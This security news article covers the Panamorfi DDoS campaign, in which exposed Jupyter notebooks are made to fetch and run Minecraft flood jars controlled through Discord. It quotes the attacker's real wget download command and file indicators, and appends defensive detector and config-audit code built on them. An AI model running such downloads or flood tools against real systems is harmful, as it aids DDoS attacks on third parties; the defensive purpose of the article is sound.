Panamorfi Campaign Leverages Minecraft DDoS Package Deployed Via Jupyter Notebook and Discord

A new wave of cyber threats has emerged, characterized by a Distributed Denial of Service (DDoS) campaign dubbed “Panamorfi.” This operation, orchestrated by the threat actor known as yawixooo, takes advantage of misconfigured Jupyter notebooks that are publicly accessible online. The attackers utilize a well-known Minecraft server DDoS tool, which they distribute via a Discord channel, with the intent of overwhelming targeted servers. Data professionals, including data engineers, analysts, and scientists who frequently use Jupyter notebooks, are particularly vulnerable to this type of attack and are urged to adopt heightened security measures.

The Anatomy of Panamorfi Attack

According to researchers from Aqua Nautilus, the Panamorfi attack begins with yawixooo gaining access to exposed Jupyter notebooks. The initial step involves executing a command to download a zip file from a file-sharing service:

wget https://filebin.net/archive/h4fhifnlykw224h9/zip

This zip file, which has a random name and an MD5 hash of 42989a405c8d7c9cb68c323ae9a9a318, is approximately 17 MB in size and contains two JAR files. Notably, these files—conn.jar and mineping.jar—were newly introduced to VirusTotal, each receiving only a single detection from a security firm.

The ‘conn.jar’ file is pivotal as it contains the code necessary for executing the attack. It leverages Discord to orchestrate the DDoS operation, establishing a connection from the victim’s machine to a designated Discord channel. This connection facilitates the loading of the ‘mineping.jar’ file, a recognized Minecraft server DDoS tool sourced from GitHub. This tool is equipped with twelve Java files designed to manage HTTP sockets, utilize proxies, flood a victim, and generate connection-related details.

Once operational, the tool initiates a TCP flood DDoS attack, strategically consuming the resources of the targeted server. The results of the attack are then relayed back to the Discord channel, providing the attackers with real-time feedback.
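The chain described above (a notebook kernel fetching a zip from filebin.net, then launching conn.jar, which in turn loads mineping.jar) is visible from process-creation telemetry alone. The following detector is an added example, not code from the Aqua Nautilus report: it walks constructed process events, finds children of a Jupyter kernel or server, and flags the indicators named on this page (the filebin.net host and the two jar names) as well as the more generic pattern of a kernel spawning a downloader or `java -jar`. The event fields (pid, ppid, image, cmdline) are an assumed schema, not any particular EDR's format.

```python
"""
Added example (not from the report): flag process activity matching the
Panamorfi chain, a Jupyter kernel spawning a downloader and then `java -jar`
on conn.jar / mineping.jar. Event lines and field names are constructed.
"""
import json
import re

# Constructed sample of process-creation events, one JSON object per line.
# pid 210/211 are two notebook kernels; 300-302 reproduce the reported chain;
# 400/500 are benign data-science activity that should not be flagged as IOC.
SAMPLE_EVENTS = """
{"pid": 100, "ppid": 1, "image": "jupyter-notebook", "cmdline": "jupyter-notebook --ip=0.0.0.0"}
{"pid": 210, "ppid": 100, "image": "python3", "cmdline": "python3 -m ipykernel_launcher -f kernel-1.json"}
{"pid": 211, "ppid": 100, "image": "python3", "cmdline": "python3 -m ipykernel_launcher -f kernel-2.json"}
{"pid": 300, "ppid": 210, "image": "wget", "cmdline": "wget https://filebin.net/archive/h4fhifnlykw224h9/zip"}
{"pid": 301, "ppid": 210, "image": "unzip", "cmdline": "unzip zip"}
{"pid": 302, "ppid": 210, "image": "java", "cmdline": "java -jar conn.jar"}
{"pid": 400, "ppid": 211, "image": "python3", "cmdline": "python3 train.py"}
{"pid": 500, "ppid": 211, "image": "wget", "cmdline": "wget https://example.org/dataset.csv"}
"""

KERNEL_RE = re.compile(r"ipykernel|jupyter", re.I)
DOWNLOADER_RE = re.compile(r"^(wget|curl)\b")
# Indicators taken from the report: the file host and the two jar names.
IOC_RE = re.compile(r"filebin\.net|conn\.jar|mineping\.jar", re.I)
JAVA_JAR_RE = re.compile(r"^java\b.*-jar\b")


def parse_events(text):
    """Parse JSON-lines process events into a list of dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def kernel_children(events):
    """Return events whose parent process is a Jupyter kernel or server."""
    by_pid = {e["pid"]: e for e in events}
    out = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and KERNEL_RE.search(parent["cmdline"]):
            out.append(e)
    return out


def detect_panamorfi(events):
    """Return (pid, reason) tuples for kernel-spawned processes matching the chain.

    Known indicators are reported as high confidence; a bare `java -jar` or a
    downloader launched from a kernel is reported for review, since notebooks
    legitimately fetch datasets with wget/curl.
    """
    findings = []
    for e in kernel_children(events):
        cmd = e["cmdline"]
        if IOC_RE.search(cmd):
            findings.append((e["pid"], "known Panamorfi indicator in command line"))
        elif JAVA_JAR_RE.search(cmd):
            findings.append((e["pid"], "java -jar launched from notebook kernel"))
        elif DOWNLOADER_RE.search(cmd):
            findings.append((e["pid"], "downloader launched from notebook kernel (review)"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect_panamorfi(parse_events(SAMPLE_EVENTS)):
        print(pid, reason)
```

Running the block on the constructed sample flags pid 300 and 302 on the page's indicators and pid 500 only as a lower-confidence "downloader from kernel" item, which is the triage split a SOC would want: exact IOCs page someone, generic kernel-spawns-a-downloader goes to a review queue.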

Yawixooo maintains an active presence on GitHub, where they share a Minecraft server configuration, alongside a website that is currently under development.

Mitigation Against The Attack

Researchers successfully disrupted the attack by implementing a runtime policy that prevents the execution of the conn.jar file, effectively neutralizing the threat. To safeguard against similar campaigns, experts recommend the following measures:

  • Restrict access to Jupyter notebooks through secure practices.
  • Block the execution of files associated with the campaign, such as conn.jar and mineping.jar.
  • Limit code execution capabilities within notebooks.
  • Regularly apply the latest security patches and updates.
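The first item, restricting access to the notebook server, comes down to a handful of settings in jupyter_server_config.py: which interface the server binds to, whether a token or password is required, and how permissive CORS and root execution are. The audit script below is an added example, not part of the report or of Jupyter itself: it parses a config file's `c.ServerApp.<trait> = <literal>` assignments with the `ast` module and reports the combinations that leave a server reachable and unauthenticated. The two config texts are constructed; `ServerApp.ip`, `ServerApp.token`, `ServerApp.password`, `ServerApp.allow_origin` and `ServerApp.allow_root` are real jupyter_server traits, and the "default" values assumed for missing keys (loopback bind, auto-generated token) reflect jupyter_server's documented defaults.

```python
"""
Added example (not from the report): audit a jupyter_server_config.py for
settings that expose an unauthenticated notebook server, the misconfiguration
the Panamorfi campaign relies on. Config texts are constructed samples.
"""
import ast

# Constructed: a server bound to all interfaces with authentication switched off.
WEAK_CONFIG = '''
c = get_config()
c.ServerApp.ip = "0.0.0.0"
c.ServerApp.port = 8888
c.ServerApp.token = ""
c.ServerApp.password = ""
c.ServerApp.allow_origin = "*"
c.ServerApp.allow_root = True
c.ServerApp.open_browser = False
'''

# Constructed: loopback bind, token left at its auto-generated default,
# CORS restricted to one origin, no root.
HARDENED_CONFIG = '''
c = get_config()
c.ServerApp.ip = "127.0.0.1"
c.ServerApp.port = 8888
c.ServerApp.allow_origin = "https://notebooks.example.internal"
c.ServerApp.allow_root = False
c.ServerApp.open_browser = False
'''

LOOPBACK = ("localhost", "127.0.0.1", "::1")


def load_settings(config_text):
    """Collect `c.<Class>.<trait> = <literal>` assignments into a dict."""
    settings = {}
    for node in ast.parse(config_text).body:
        if not isinstance(node, ast.Assign) or len(node.targets) != 1:
            continue
        target = node.targets[0]
        if not (isinstance(target, ast.Attribute)
                and isinstance(target.value, ast.Attribute)
                and isinstance(target.value.value, ast.Name)
                and target.value.value.id == "c"):
            continue  # skip `c = get_config()` and anything not of the c.X.y form
        key = f"{target.value.attr}.{target.attr}"
        try:
            settings[key] = ast.literal_eval(node.value)
        except ValueError:
            settings[key] = None  # computed value (a call, etc.); treat as unknown
    return settings


def audit(config_text):
    """Return a list of finding strings; an empty list means nothing flagged."""
    s = load_settings(config_text)
    findings = []
    ip = s.get("ServerApp.ip", "localhost")  # jupyter_server default is localhost
    listens_publicly = ip not in LOOPBACK
    # An unset token is auto-generated; only an explicit "" disables it.
    token_disabled = s.get("ServerApp.token") == ""
    has_password = bool(s.get("ServerApp.password"))
    if listens_publicly and token_disabled and not has_password:
        findings.append(f"ip={ip!r} with token and password disabled: "
                        "anyone who can reach the port gets code execution")
    elif listens_publicly:
        findings.append(f"ip={ip!r}: non-loopback bind, confirm a firewall or "
                        "authenticating proxy fronts it")
    if s.get("ServerApp.allow_origin") == "*":
        findings.append("allow_origin='*': any web origin may drive the server")
    if s.get("ServerApp.allow_root") is True:
        findings.append("allow_root=True: kernel code runs as root")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or ["ok"])
```

The script is deliberately conservative about defaults: a missing `ServerApp.token` is treated as "token required", because jupyter_server generates one, so only an explicit empty string counts as disabled. That keeps the audit from producing noise on stock configs while still catching the exposed-and-unauthenticated combination this campaign depends on.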

Security professionals consistently advise against sharing sensitive information or credentials within Jupyter notebooks, as they can serve as prime targets for malicious campaigns.
